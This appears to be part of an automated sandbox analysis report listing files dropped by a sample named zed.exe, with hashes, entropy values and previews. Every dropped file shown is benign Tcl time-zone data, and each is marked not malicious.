                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Dawson_Creek) {.. {-9223372036854775808 -28856 0 LMT}.. {-2713881544 -28800 0 PST}.. {-1632060000 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-725817600 -28800 0 PST}.. {-715788000 -25200 1 PDT}.. {-702486000 -28800 0 PST}.. {-684338400 -25200 1 PDT}.. {-671036400 -28800 0 PST}.. {-652888800 -25200 1 PDT}.. {-639586800 -28800 0 PST}.. {-620834400 -25200 1 PDT}.. {-608137200 -28800 0 PST}.. {-589384800 -25200 1 PDT}.. {-576082800 -28800 0 PST}.. {-557935200 -25200 1 PDT}.. {-544633200 -28800 0 PST}.. {-526485600 -25200 1 PDT}.. {-513183600 -28800 0 PST}.. {-495036000 -25200 1 PDT}.. {-481734000 -28800 0 PST}.. {-463586400 -25200 1 PDT}.. {-450284400 -28800 0 PST}.. {-431532000 -25200 1 PDT}.. {-418230000 -28800 0 PST}.. {-400082400 -25200 1 PDT}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8920
                                                                                                                                                                                                                                            Entropy (8bit):3.8540632258197514
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:gjGtwmGaLV911sF7Lv/PCewtA8CzSPyDLbrcUia:gUwDPlLv/PCenJzS6cy
                                                                                                                                                                                                                                            MD5:0D649599A899ECB3FCF2783DCEE3E37B
                                                                                                                                                                                                                                            SHA1:ACC796BE75F41A12FB1F8CCBD2B2839AF9876FFE
                                                                                                                                                                                                                                            SHA-256:3FE2EE8C05C5D6F268B58BD9FC3E3A845DEA257473B29F7B3FB403E917448F3C
                                                                                                                                                                                                                                            SHA-512:C10D41AB95439B8E978F12F9F58D1ACC9AD15404123FA5FBA0D1CC716E5CF5DA6BD2252450055AC3998DBCB8DD49F7A82ACD53413E3EE78CDA2C42F603DE2C56
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Denver) {.. {-9223372036854775808 -25196 0 LMT}.. {-2717643600 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-1577898000 -25200 0 MST}.. {-1570374000 -21600 1 MDT}.. {-1551628800 -25200 0 MST}.. {-1538924400 -21600 1 MDT}.. {-1534089600 -25200 0 MST}.. {-883587600 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-757357200 -25200 0 MST}.. {-147884400 -21600 1 MDT}.. {-131558400 -25200 0 MST}.. {-116434800 -21600 1 MDT}.. {-100108800 -25200 0 MST}.. {-94669200 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -2
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8430
                                                                                                                                                                                                                                            Entropy (8bit):3.826664943157435
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:SGiS1A5tCt/cL1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:SG/K5ItON0HY2iUmUFLqU
                                                                                                                                                                                                                                            MD5:2BBA922E9377D257CBDF6E1367BBB1A2
                                                                                                                                                                                                                                            SHA1:6F33A44834E8041E78660A326A5DDAF3D7F9DC2A
                                                                                                                                                                                                                                            SHA-256:84F6897B87D3978D30D35097B78C55434CE55EB65D6E488A391DFC3B3BB5A8FE
                                                                                                                                                                                                                                            SHA-512:D225824945C08A3521A8288B92B26DFFA712ED3505E72DEDE4A7D1777E58DEA79ADF3F042D22624E4142DD4203BAA4DFF8EB08B7033FDF00059F6C39954EA1A1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Detroit) {.. {-9223372036854775808 -19931 0 LMT}.. {-2051202469 -21600 0 CST}.. {-1724083200 -18000 0 EST}.. {-883594800 -18000 0 EST}.. {-880218000 -14400 1 EWT}.. {-769395600 -14400 1 EPT}.. {-765396000 -18000 0 EST}.. {-757364400 -18000 0 EST}.. {-684349200 -14400 1 EDT}.. {-671047200 -18000 0 EST}.. {-80506740 -14400 0 EDT}.. {-68666400 -18000 0 EST}.. {-52938000 -14400 1 EDT}.. {-37216800 -18000 0 EST}.. {-31518000 -18000 0 EST}.. {94712400 -18000 0 EST}.. {104914800 -14400 1 EDT}.. {120636000 -18000 0 EST}.. {126687600 -14400 1 EDT}.. {152085600 -18000 0 EST}.. {157784400 -18000 0 EST}.. {167814000 -14400 0 EDT}.. {183535200 -18000 0 EST}.. {199263600 -14400 1 EDT}.. {215589600 -18000 0 EST}.. {230713200 -14400 1 EDT}.. {247039200 -18000 0 EST}.. {262767600 -14400 1 EDT}.. {278488800 -18000 0 EST}.. {294217200 -14400 1 EDT}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):202
                                                                                                                                                                                                                                            Entropy (8bit):4.86856578093135
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290TL3290ppv:MByMYbpwt290Tr290b
                                                                                                                                                                                                                                            MD5:398D8DBB24CEA2D174EF05F63869C94A
                                                                                                                                                                                                                                            SHA1:6D0E04165952E873E6ECA33A0E54761B747F0A98
                                                                                                                                                                                                                                            SHA-256:3DA98AA7D3085845779BE8ED6C93CCBDA92191F17CA67BBF779803E21DA2ABF3
                                                                                                                                                                                                                                            SHA-512:2652AFD1A3F8A4B84078A964005FE10C64491EC2D47CDE57D5066D07D1D837308FD696F53B9E7B6B0E72F86F9A85128B8CBF5F302F91EADE6D840DF946DE85CD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Dominica) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8600
                                                                                                                                                                                                                                            Entropy (8bit):3.8579895970456137
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:7SabOGaLm911sF7Lv/PCewtA8CzSPyDLbrcUia:7vf4lLv/PCenJzS6cy
                                                                                                                                                                                                                                            MD5:EBD169ECA4D45EED28BF7B27809361BC
                                                                                                                                                                                                                                            SHA1:E89C8484A29D792FB6349CFDFDD30C2FA6B78B6B
                                                                                                                                                                                                                                            SHA-256:026D51D73D30A3710288F440E0C337E44E3A14D0AA2D7B6C6E53AF43FC72A90C
                                                                                                                                                                                                                                            SHA-512:45C936ED7D4AF95261180547013454AAEC9FA7672B52AC6077DD99D9FEB6DDD57652FE4EC67BF81F1588384F3027A1872E0C72D9CAEB980B66D2CB6EE9B8ABB0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Edmonton) {.. {-9223372036854775808 -27232 0 LMT}.. {-1998663968 -25200 0 MST}.. {-1632063600 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1600614000 -21600 1 MDT}.. {-1596816000 -25200 0 MST}.. {-1567954800 -21600 1 MDT}.. {-1551628800 -25200 0 MST}.. {-1536505200 -21600 1 MDT}.. {-1523203200 -25200 0 MST}.. {-1504450800 -21600 1 MDT}.. {-1491753600 -25200 0 MST}.. {-1473001200 -21600 1 MDT}.. {-1459699200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-715791600 -21600 1 MDT}.. {-702489600 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {136371600 -21600 1 MDT}.. {152092800 -25200 0 MST}.. {167821200 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {215596800 -25200 0 MST}.. {23072
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1230
                                                                                                                                                                                                                                            Entropy (8bit):3.7989525000422963
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5OXUepdkZss/uuD/uVK/uNC/uvFe/uxJs/u74O/u83C/uc8J/uhF8/uNHs/ulU6w:5OXCZsMw57XJh4CxUF/A6GTrtSUUhfL0
                                                                                                                                                                                                                                            MD5:6766E75702D8C2D1C986DFCEFCE554F9
                                                                                                                                                                                                                                            SHA1:39553F80D82BC0134FAF70C9830B96BDCBCEFF1C
                                                                                                                                                                                                                                            SHA-256:48FC987E5999EA79F24797E0450FE4DAB7CF320DFAD7A47A8A1E037077EC42C9
                                                                                                                                                                                                                                            SHA-512:A812D0D4254BB0B7DB7AE116652D2A8F97D22C59F2709A17D1CE435FCFB38B807A4E0ED6EA114A66897E29D85226875FA84D28B254A5D17BD1CBA95FAD8349B7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Eirunepe) {.. {-9223372036854775808 -16768 0 LMT}.. {-1767208832 -18000 0 -05}.. {-1206950400 -14400 1 -05}.. {-1191355200 -18000 0 -05}.. {-1175367600 -14400 1 -05}.. {-1159819200 -18000 0 -05}.. {-633812400 -14400 1 -05}.. {-622062000 -18000 0 -05}.. {-602276400 -14400 1 -05}.. {-591825600 -18000 0 -05}.. {-570740400 -14400 1 -05}.. {-560203200 -18000 0 -05}.. {-539118000 -14400 1 -05}.. {-531345600 -18000 0 -05}.. {-191358000 -14400 1 -05}.. {-184190400 -18000 0 -05}.. {-155156400 -14400 1 -05}.. {-150062400 -18000 0 -05}.. {-128890800 -14400 1 -05}.. {-121118400 -18000 0 -05}.. {-99946800 -14400 1 -05}.. {-89582400 -18000 0 -05}.. {-68410800 -14400 1 -05}.. {-57960000 -18000 0 -05}.. {499755600 -14400 1 -05}.. {511243200 -18000 0 -05}.. {530600400 -14400 1 -05}.. {540273600 -18000 0 -05}.. {562136400 -14400 1 -05}.. {571204800
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):279
                                                                                                                                                                                                                                            Entropy (8bit):4.760311149376001
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/29078iPDm2OHvJ4YoHxHhgdrV/uF+IcmJ3/uF+ivNv:MB8629078AmdHx4YCJSB/uF+QV/uF+w9
                                                                                                                                                                                                                                            MD5:CEF7277443EB6990E72C7EA7F79A122C
                                                                                                                                                                                                                                            SHA1:1D3FEA364B3DC129DE3998A1455D5588EBAA6FF8
                                                                                                                                                                                                                                            SHA-256:C02C6E79398553BD07BEA0BE4B7F0EBDD8BC821595909CFFB49DE4290A0D1D0F
                                                                                                                                                                                                                                            SHA-512:E6FC530B2CCF010B8D38BC3F49A6859B5C68F4AB604E6305CE75FBE4FC9FF3FCD0187DEBEF6DAE652EEF9695568DBDE31F426E404CC3CC206D78183E0D919234
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/El_Salvador) {.. {-9223372036854775808 -21408 0 LMT}.. {-1546279392 -21600 0 CST}.. {547020000 -18000 1 CDT}.. {559717200 -21600 0 CST}.. {578469600 -18000 1 CDT}.. {591166800 -21600 0 CST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):190
                                                                                                                                                                                                                                            Entropy (8bit):4.836337676384058
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qfSfXHAIg20qfORL/2IAcGE7JM7QIAcGEqfBn:SlSWB9vsM3y7ekHAIgpeON/2907390eB
                                                                                                                                                                                                                                            MD5:005D9C0E50291616A727CFB74A9FD37E
                                                                                                                                                                                                                                            SHA1:846AE6720382B4F67B37B4256E45246C81DAF899
                                                                                                                                                                                                                                            SHA-256:3E363BF82545F24CCE8CFA6EEC97BA6E1C2A7730B2A9CE6C48F784821D308A5D
                                                                                                                                                                                                                                            SHA-512:452326D11D01825764BC40A77D17444D822F3AA202582233DD8B122798478FA83E3A27A02508EAC4CF0C7922AC2563742D773AA870562AE496B34FBB41FBAD63
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Tijuana)]} {.. LoadTimeZoneFile America/Tijuana..}..set TZData(:America/Ensenada) $TZData(:America/Tijuana)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4578
                                                                                                                                                                                                                                            Entropy (8bit):3.8944281193962818
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5QIgsB/YRRvkGZ+R64CjSUlTG5Al5pj/A1ZFCARCeQbvb5+:6IgzR864CjSETG5sjgZkR/bvt+
                                                                                                                                                                                                                                            MD5:4A4E023F635C4202018EA9E8F85B5047
                                                                                                                                                                                                                                            SHA1:38E121FE2D419413E9E791B6C22BFC8D9F7554BC
                                                                                                                                                                                                                                            SHA-256:AB15023807E7C7D1026C9970D190F1B405D48952464025242C2BB6C6BBB8391A
                                                                                                                                                                                                                                            SHA-512:F10D21A2C841224879D1C817FC7F477DF582E1BC3603666B55199C098D51D1D5429F8C088C1083C07FC7588AE5C42A1DFBCC6B7C636AD1BE84ED657807A229E5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Fort_Nelson) {.. {-9223372036854775808 -29447 0 LMT}.. {-2713880953 -28800 0 PST}.. {-1632060000 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-757353600 -28800 0 PST}.. {-725817600 -28800 0 PST}.. {-715788000 -25200 1 PDT}.. {-702486000 -28800 0 PST}.. {-684338400 -25200 1 PDT}.. {-671036400 -28800 0 PST}.. {-652888800 -25200 1 PDT}.. {-639586800 -28800 0 PST}.. {-620834400 -25200 1 PDT}.. {-608137200 -28800 0 PST}.. {-589384800 -25200 1 PDT}.. {-576082800 -28800 0 PST}.. {-557935200 -25200 1 PDT}.. {-544633200 -28800 0 PST}.. {-526485600 -25200 1 PDT}.. {-513183600 -28800 0 PST}.. {-495036000 -25200 1 PDT}.. {-481734000 -28800 0 PST}.. {-463586400 -25200 1 PDT}.. {-450284400 -28800 0 PST}.. {-431532000 -25200 1 PDT}.. {-418230000 -28800 0 PST}.. {
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):231
                                                                                                                                                                                                                                            Entropy (8bit):4.778858143786314
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y73GK7JHAIgp3GKZRN/290HXYAp4903GK8:MByMY3GK7Kp3GKnt290Hz4903GK8
                                                                                                                                                                                                                                            MD5:24C369A3091452DCA7AAEBF4F48F5289
                                                                                                                                                                                                                                            SHA1:2C2174CB16F490689E6FAC17B6D18F4A0DBD2DC9
                                                                                                                                                                                                                                            SHA-256:C8948616262CF6990739343ABBBD237E572DB49310099E21DD8F9E317F7D11B3
                                                                                                                                                                                                                                            SHA-512:80F579572754579706B4EEA49BF30456F3231A308E0616DC430E2428A04992412773421542E4F7FE4E4C7491BA88942FA44B49E87E95A2183211AC2AB523B231
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Indiana/Indianapolis)]} {.. LoadTimeZoneFile America/Indiana/Indianapolis..}..set TZData(:America/Fort_Wayne) $TZData(:America/Indiana/Indianapolis)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1423
                                                                                                                                                                                                                                            Entropy (8bit):3.784027854102512
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5MeajcChlrLPsw6kSS3h5R14eH8tf3GvIkuoYVZaIBXR8nd:5rChlvEw6kSSx5H4a8tf3fkuoYVZDNRo
                                                                                                                                                                                                                                            MD5:E7939C9A3F83D73B82A6DE359365EFD4
                                                                                                                                                                                                                                            SHA1:06D6E257DA7C317CAFAF6C0B04567A2453CC1660
                                                                                                                                                                                                                                            SHA-256:C0A836BDAF07F0376B7B0833A0AB3D52BA6E3E1D6F95E247E1AD351CD1096066
                                                                                                                                                                                                                                            SHA-512:E2BEA04084489B26ADD9A768D2580C1FF7EBAC8A3EA36818F49E85FB14E01500D59D53904F5A17F4DABEF27B4CC2FC3F977EE4C125E5CE739BBE90C130ED3B07
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Fortaleza) {.. {-9223372036854775808 -9240 0 LMT}.. {-1767216360 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8372
                                                                                                                                                                                                                                            Entropy (8bit):3.8225708746657316
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:w4lTPB10KvnpNWMPm4bPJWXtRbALtuFW4ng2CEBJuQaeEy9P19OBYEi/B51B7/BI:wKCC
                                                                                                                                                                                                                                            MD5:1C8B0B85BB5578E84A4867546111F946
                                                                                                                                                                                                                                            SHA1:E08A96F5B369FA53BC1F3F839EC14FF9D334F727
                                                                                                                                                                                                                                            SHA-256:58C207CBD9DE7A7BB15E48A62CEA9F15DA184B945133DEE88EFF29FD8B66B29E
                                                                                                                                                                                                                                            SHA-512:54CFBF208AB3E58AFB6BEC40265A452A3C4C684D7F278F51D6495FCA544652A1A5E05BC45F600911191B33C936E5D7D43A28FD2B0884AAB9F63B7AD5EFD574A1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Glace_Bay) {.. {-9223372036854775808 -14388 0 LMT}.. {-2131646412 -14400 0 AST}.. {-1632074400 -10800 1 ADT}.. {-1615143600 -14400 0 AST}.. {-880221600 -10800 1 AWT}.. {-769395600 -10800 1 APT}.. {-765399600 -14400 0 AST}.. {-536443200 -14400 0 AST}.. {-526500000 -10800 1 ADT}.. {-513198000 -14400 0 AST}.. {-504907200 -14400 0 AST}.. {63086400 -14400 0 AST}.. {73461600 -10800 1 ADT}.. {89182800 -14400 0 AST}.. {104911200 -10800 1 ADT}.. {120632400 -14400 0 AST}.. {126244800 -14400 0 AST}.. {136360800 -10800 1 ADT}.. {152082000 -14400 0 AST}.. {167810400 -10800 1 ADT}.. {183531600 -14400 0 AST}.. {199260000 -10800 1 ADT}.. {215586000 -14400 0 AST}.. {230709600 -10800 1 ADT}.. {247035600 -14400 0 AST}.. {262764000 -10800 1 ADT}.. {278485200 -14400 0 AST}.. {294213600 -10800 1 ADT}.. {309934800 -14400 0 AST}.. {325663200 -10800 1 ADT}
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):180
                                                                                                                                                                                                                                            Entropy (8bit):4.973070790103308
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0wQbSeyXHAIg20wQboAFARL/2IAcGE5GZJ4IAcGEH:SlSWB9vsM3y7lbSeSHAIgplbLFAN/291
                                                                                                                                                                                                                                            MD5:8263D2B39C2EC3B38A179F8BAD5972DD
                                                                                                                                                                                                                                            SHA1:18D3462F6846768E16036E860DE90FB345C93047
                                                                                                                                                                                                                                            SHA-256:5FB2CFBA25CE2F49D4C3911AFF8E7E1FF84EFC2D01F5783772E88246BFBC56AC
                                                                                                                                                                                                                                            SHA-512:C175CAF972459759553001D48921268E9C6268CED56021BA6339F8CE3DD032DA6180E2B82974D3DCD0DC5F21566DFDBFBE1B6CF24E5E893F2335A449452DB27F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Nuuk)]} {.. LoadTimeZoneFile America/Nuuk..}..set TZData(:America/Godthab) $TZData(:America/Nuuk)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10353
                                                                                                                                                                                                                                            Entropy (8bit):3.864463676759425
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:zfSacO8f7/ewzlrfFj18KvnpNWMPm4bPJvSuYUHgA0G19OBYEi/B51B7/Bm6BTdW:zfSacOI7/V3SuYUHgAuCC
                                                                                                                                                                                                                                            MD5:0D646C67105FD0525E7CCC79585CE9DF
                                                                                                                                                                                                                                            SHA1:06D91FDD8FEEDC299E40079569372F97A9AC6F04
                                                                                                                                                                                                                                            SHA-256:52D2478289682BF95BFB93D64D679E888C9D23C0F68DFFF7E6E34BFC44B3D892
                                                                                                                                                                                                                                            SHA-512:FD672613C2B65E12425415630A2F489917EB80DDED41338C9AA7D5D3C6B54E52C516A32493593F518DACF22A91D7A9D2C96DB9C5F1BE2C3BB9842D274BDC04FF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Goose_Bay) {.. {-9223372036854775808 -14500 0 LMT}.. {-2713895900 -12652 0 NST}.. {-1640982548 -12652 0 NST}.. {-1632076148 -9052 1 NDT}.. {-1615145348 -12652 0 NST}.. {-1609446548 -12652 0 NST}.. {-1096921748 -12600 0 NST}.. {-1072989000 -12600 0 NST}.. {-1061670600 -9000 1 NDT}.. {-1048973400 -12600 0 NST}.. {-1030221000 -9000 1 NDT}.. {-1017523800 -12600 0 NST}.. {-998771400 -9000 1 NDT}.. {-986074200 -12600 0 NST}.. {-966717000 -9000 1 NDT}.. {-954624600 -12600 0 NST}.. {-935267400 -9000 1 NDT}.. {-922570200 -12600 0 NST}.. {-903817800 -9000 1 NDT}.. {-891120600 -12600 0 NST}.. {-872368200 -9000 0 NWT}.. {-769395600 -9000 1 NPT}.. {-765401400 -12600 0 NST}.. {-757369800 -12600 0 NST}.. {-746044200 -9000 1 NDT}.. {-733347000 -12600 0 NST}.. {-714594600 -9000 1 NDT}.. {-701897400 -12600 0 NST}.. {-683145000 -9000 1 NDT}.. {-67044
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7522
                                                                                                                                                                                                                                            Entropy (8bit):3.84007813579738
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:pGStCt/cL1BRv0HY2iU7KKdFL6Aa2K4gSLf8e:pvItOx0HY2iUmUFLqU
                                                                                                                                                                                                                                            MD5:A17723CE27EC99D1506C45AB1531085B
                                                                                                                                                                                                                                            SHA1:A83ED7BD09514A829CC8F2EA47BA113F5DCA1090
                                                                                                                                                                                                                                            SHA-256:560B39485CED4C2A0E85A66EB875331E5879104187D92CB7F05C2F635E34AC99
                                                                                                                                                                                                                                            SHA-512:110D1253D6915DB046247E4FD3BA9B881146BC3896DE779215E0CC6D1DCC59958C355441955509F5D38E3A3BA166DFD0F2F277000E9E89D6551FBEA0C16974B9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Grand_Turk) {.. {-9223372036854775808 -17072 0 LMT}.. {-2524504528 -18430 0 KMT}.. {-1827687170 -18000 0 EST}.. {284014800 -18000 0 EST}.. {294217200 -14400 1 EDT}.. {309938400 -18000 0 EST}.. {325666800 -14400 1 EDT}.. {341388000 -18000 0 EST}.. {357116400 -14400 1 EDT}.. {372837600 -18000 0 EST}.. {388566000 -14400 1 EDT}.. {404892000 -18000 0 EST}.. {420015600 -14400 1 EDT}.. {436341600 -18000 0 EST}.. {452070000 -14400 1 EDT}.. {467791200 -18000 0 EST}.. {483519600 -14400 1 EDT}.. {499240800 -18000 0 EST}.. {514969200 -14400 1 EDT}.. {530690400 -18000 0 EST}.. {544604400 -14400 1 EDT}.. {562140000 -18000 0 EST}.. {576054000 -14400 1 EDT}.. {594194400 -18000 0 EST}.. {607503600 -14400 1 EDT}.. {625644000 -18000 0 EST}.. {638953200 -14400 1 EDT}.. {657093600 -18000 0 EST}.. {671007600 -14400 1 EDT}.. {688543200 -18000 0 EST}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):201
                                                                                                                                                                                                                                            Entropy (8bit):4.892013473075135
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/2905Qb90ppv:MByMYbpwt290Ob90b
                                                                                                                                                                                                                                            MD5:4B9ABEA103F55509550F8B42D88E84B7
                                                                                                                                                                                                                                            SHA1:E3AA1BCE5E260264E74F77E59C4071B7E496AB41
                                                                                                                                                                                                                                            SHA-256:EBED070E8E67C5F12FF6E03FE508BE90789F17C793DFE61237B4045B8222580F
                                                                                                                                                                                                                                            SHA-512:568E375464FF264C5048CB35995945BDE1D5BCC3A108B2A4D0F8389EBF18B4C58EBB1C2122F10BA777D512504A59C7EFDF6069EABD2A5DEA3189204B7F7A6EB4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Grenada) $TZData(:America/Puerto_Rico)..
